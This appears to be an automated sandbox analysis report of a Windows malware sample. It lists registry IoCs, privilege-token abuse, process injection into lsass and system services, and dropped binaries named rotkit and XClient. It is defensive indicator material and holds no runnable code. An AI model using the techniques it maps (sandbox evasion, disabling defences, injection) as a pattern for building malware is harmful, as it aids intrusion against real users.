\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe -
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
mousocoreworker.exesvchost.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
mousocoreworker.exewmiprvse.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
WaaSMedicAgent.exesvchost.exepowershell.EXEmousocoreworker.exesvchost.exeOfficeClickToRun.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\42-72-4b-4e-13-12\WpadDecisionReason = "1" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={27D6FD15-D07D-4FBB-BD69-05A5882CAEDD}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\00184010F86B2C47 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000a69214f3d6736b4d85981f88e145522b00000000020000000000106600000001000020000000dacba249f23609ce678fcae26485ceb390e03ebb0949c2f0bc244d7a24b303b7000000000e80000000020000200000000f9b89f6ef49591089d62936250b3b4cf8598d208a4a7a44f6f4f498476c37ca8000000017817d5e9b7ea598a66623b58991b7ec0605a9d94b0505ad4d48a8505918f68487081aa8dce8db25b63ac92f34e47d2f8c442ef3ccb8c525252290f258507fef49f1bf8782b38b1b22f371f0a56f732101e3a61157432a568b2edbc5f9a7b68f6140c4f627a651dc875c67bd6989e2355d766b03de05e76d22e90f64fa1447ed4000000000192d8b2a8fe2e8be9171fab5c7618bbd804e9f807888ac791f0e1d688783220319e7b389f45c996d4e9df491031bf60cf83f446e5e5d186c915d8ad076d1a9 mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} mousocoreworker.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows mousocoreworker.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Fri, 15 Nov 2024 02:05:21 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\42-72-4b-4e-13-12\WpadDecision = "0" svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore mousocoreworker.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE -
Modifies registry class 25 IoCs
Processes:
explorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exesihost.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings explorer.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
dControl.exepowershell.EXEdControl.exedControl.exedllhost.exepowershell.exedControl.exepid process 4656 dControl.exe 4656 dControl.exe 4656 dControl.exe 4656 dControl.exe 2024 powershell.EXE 4656 dControl.exe 4656 dControl.exe 4024 dControl.exe 4024 dControl.exe 4024 dControl.exe 4024 dControl.exe 4024 dControl.exe 4024 dControl.exe 3948 dControl.exe 3948 dControl.exe 2024 powershell.EXE 2024 powershell.EXE 1184 dllhost.exe 1184 dllhost.exe 1184 dllhost.exe 1184 dllhost.exe 2096 powershell.exe 2096 powershell.exe 2096 powershell.exe 1184 dllhost.exe 1184 dllhost.exe 1184 dllhost.exe 1184 dllhost.exe 1184 dllhost.exe 1184 dllhost.exe 2096 powershell.exe 1184 dllhost.exe 1184 dllhost.exe 1184 dllhost.exe 1184 dllhost.exe 1184 dllhost.exe 1184 dllhost.exe 1184 dllhost.exe 1184 dllhost.exe 2096 powershell.exe 1184 dllhost.exe 1184 dllhost.exe 1184 dllhost.exe 1184 dllhost.exe 1184 dllhost.exe 1184 dllhost.exe 1184 dllhost.exe 1184 dllhost.exe 1184 dllhost.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 2096 powershell.exe 3948 dControl.exe 3948 dControl.exe 1184 dllhost.exe 1184 dllhost.exe 2732 dControl.exe 2732 dControl.exe 1184 dllhost.exe 1184 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
dControl.exepid process 3948 dControl.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
www.XClient.exedControl.exepowershell.EXEdControl.exedllhost.exepowershell.exeExplorer.EXEdControl.exepowershell.exesvchost.exesvchost.exedescription pid process Token: SeDebugPrivilege 3936 www.XClient.exe Token: SeDebugPrivilege 4656 dControl.exe Token: SeAssignPrimaryTokenPrivilege 4656 dControl.exe Token: SeIncreaseQuotaPrivilege 4656 dControl.exe Token: 0 4656 dControl.exe Token: SeDebugPrivilege 2024 powershell.EXE Token: SeDebugPrivilege 4024 dControl.exe Token: SeAssignPrimaryTokenPrivilege 4024 dControl.exe Token: SeIncreaseQuotaPrivilege 4024 dControl.exe Token: SeDebugPrivilege 2024 powershell.EXE Token: SeDebugPrivilege 1184 dllhost.exe Token: SeDebugPrivilege 2096 powershell.exe Token: SeShutdownPrivilege 3460 Explorer.EXE Token: SeCreatePagefilePrivilege 3460 Explorer.EXE Token: SeShutdownPrivilege 3460 Explorer.EXE Token: SeCreatePagefilePrivilege 3460 Explorer.EXE Token: SeShutdownPrivilege 3460 Explorer.EXE Token: SeCreatePagefilePrivilege 3460 Explorer.EXE Token: SeShutdownPrivilege 3460 Explorer.EXE Token: SeCreatePagefilePrivilege 3460 Explorer.EXE Token: SeDebugPrivilege 3948 dControl.exe Token: SeAssignPrimaryTokenPrivilege 3948 dControl.exe Token: SeIncreaseQuotaPrivilege 3948 dControl.exe Token: 0 3948 dControl.exe Token: SeShutdownPrivilege 3460 Explorer.EXE Token: SeCreatePagefilePrivilege 3460 Explorer.EXE Token: SeShutdownPrivilege 3460 Explorer.EXE Token: SeCreatePagefilePrivilege 3460 Explorer.EXE Token: SeShutdownPrivilege 3460 Explorer.EXE Token: SeCreatePagefilePrivilege 3460 Explorer.EXE Token: SeDebugPrivilege 4344 powershell.exe Token: SeShutdownPrivilege 2388 svchost.exe Token: SeCreatePagefilePrivilege 2388 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1476 svchost.exe Token: SeIncreaseQuotaPrivilege 1476 svchost.exe Token: SeSecurityPrivilege 1476 svchost.exe Token: SeTakeOwnershipPrivilege 1476 svchost.exe Token: SeLoadDriverPrivilege 1476 svchost.exe Token: SeBackupPrivilege 1476 svchost.exe Token: SeRestorePrivilege 1476 svchost.exe Token: SeShutdownPrivilege 1476 svchost.exe Token: SeSystemEnvironmentPrivilege 1476 svchost.exe Token: SeManageVolumePrivilege 1476 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1476 svchost.exe Token: SeIncreaseQuotaPrivilege 1476 svchost.exe Token: SeSecurityPrivilege 1476 svchost.exe Token: SeTakeOwnershipPrivilege 1476 svchost.exe Token: SeLoadDriverPrivilege 1476 svchost.exe Token: SeSystemtimePrivilege 1476 svchost.exe Token: SeBackupPrivilege 1476 svchost.exe Token: SeRestorePrivilege 1476 svchost.exe Token: SeShutdownPrivilege 1476 svchost.exe Token: SeSystemEnvironmentPrivilege 1476 svchost.exe Token: SeUndockPrivilege 1476 svchost.exe Token: SeManageVolumePrivilege 1476 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1476 svchost.exe Token: SeIncreaseQuotaPrivilege 1476 svchost.exe Token: SeSecurityPrivilege 1476 svchost.exe Token: SeTakeOwnershipPrivilege 1476 svchost.exe Token: SeLoadDriverPrivilege 1476 svchost.exe Token: SeSystemtimePrivilege 1476 svchost.exe Token: SeBackupPrivilege 1476 svchost.exe Token: SeRestorePrivilege 1476 svchost.exe Token: SeShutdownPrivilege 1476 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
dControl.exepid process 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
dControl.exepid process 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe 3948 dControl.exe -
Suspicious use of SetWindowsHookEx 25 IoCs
Processes:
OpenWith.exewww.XClient.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exepid process 4956 OpenWith.exe 3936 www.XClient.exe 4660 OpenWith.exe 1840 OpenWith.exe 3668 OpenWith.exe 4436 OpenWith.exe 4796 OpenWith.exe 4108 OpenWith.exe 2880 OpenWith.exe 4652 OpenWith.exe 1408 OpenWith.exe 5080 OpenWith.exe 2884 OpenWith.exe 2312 OpenWith.exe 2740 OpenWith.exe 1712 OpenWith.exe 3540 OpenWith.exe 3116 OpenWith.exe 4816 OpenWith.exe 2416 OpenWith.exe 456 OpenWith.exe 4816 OpenWith.exe 5052 OpenWith.exe 3348 OpenWith.exe 4640 OpenWith.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3460 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exewww.rotkit.exepowershell.EXEdllhost.exewww.XClient.exelsass.exedescription pid process target process PID 1968 wrote to memory of 4656 1968 c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe dControl.exe PID 1968 wrote to memory of 4656 1968 c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe dControl.exe PID 1968 wrote to memory of 4656 1968 c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe dControl.exe PID 1968 wrote to memory of 740 1968 c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe www.rotkit.exe PID 1968 wrote to memory of 740 1968 c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe www.rotkit.exe PID 1968 wrote to memory of 740 1968 c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe www.rotkit.exe PID 1968 wrote to memory of 3936 1968 c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe www.XClient.exe PID 1968 wrote to memory of 3936 1968 c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe www.XClient.exe PID 1968 wrote to memory of 3936 1968 c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe www.XClient.exe PID 740 wrote to memory of 5060 740 www.rotkit.exe KktXMQ.exe PID 740 wrote to memory of 5060 740 www.rotkit.exe KktXMQ.exe PID 740 wrote to memory of 5060 740 www.rotkit.exe KktXMQ.exe PID 2024 wrote to memory of 1184 2024 powershell.EXE dllhost.exe PID 2024 wrote to memory of 1184 2024 powershell.EXE dllhost.exe PID 2024 wrote to memory of 1184 2024 powershell.EXE dllhost.exe PID 2024 wrote to memory of 1184 2024 powershell.EXE dllhost.exe PID 2024 wrote to memory of 1184 2024 powershell.EXE dllhost.exe PID 2024 wrote to memory of 1184 2024 powershell.EXE dllhost.exe PID 2024 wrote to memory of 1184 2024 powershell.EXE dllhost.exe PID 2024 wrote to memory of 1184 2024 powershell.EXE dllhost.exe PID 1184 wrote to memory of 616 1184 dllhost.exe winlogon.exe PID 1184 wrote to memory of 668 1184 dllhost.exe lsass.exe PID 1184 wrote to memory of 956 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 384 1184 dllhost.exe dwm.exe PID 1184 wrote to memory of 440 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 928 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 1076 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 1092 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 1108 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 1140 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 1272 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 1292 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 1368 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 1448 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 1456 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 1532 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 1544 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 1656 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 1680 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 1736 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 1792 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 1868 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 1972 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 2000 1184 dllhost.exe svchost.exe PID 3936 wrote to memory of 2096 3936 www.XClient.exe powershell.exe PID 3936 wrote to memory of 2096 3936 www.XClient.exe powershell.exe PID 3936 wrote to memory of 2096 3936 www.XClient.exe powershell.exe PID 668 wrote to memory of 2772 668 lsass.exe sysmon.exe PID 1184 wrote to memory of 2008 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 1476 1184 dllhost.exe svchost.exe PID 668 wrote to memory of 2772 668 lsass.exe sysmon.exe PID 1184 wrote to memory of 1016 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 2088 1184 dllhost.exe spoolsv.exe PID 1184 wrote to memory of 2200 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 2372 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 2480 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 2488 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 2648 1184 dllhost.exe sihost.exe PID 1184 wrote to memory of 2664 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 2716 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 2744 1184 dllhost.exe taskhostw.exe PID 1184 wrote to memory of 2772 1184 dllhost.exe sysmon.exe PID 1184 wrote to memory of 2784 1184 dllhost.exe svchost.exe PID 1184 wrote to memory of 2816 1184 dllhost.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:384
-
-
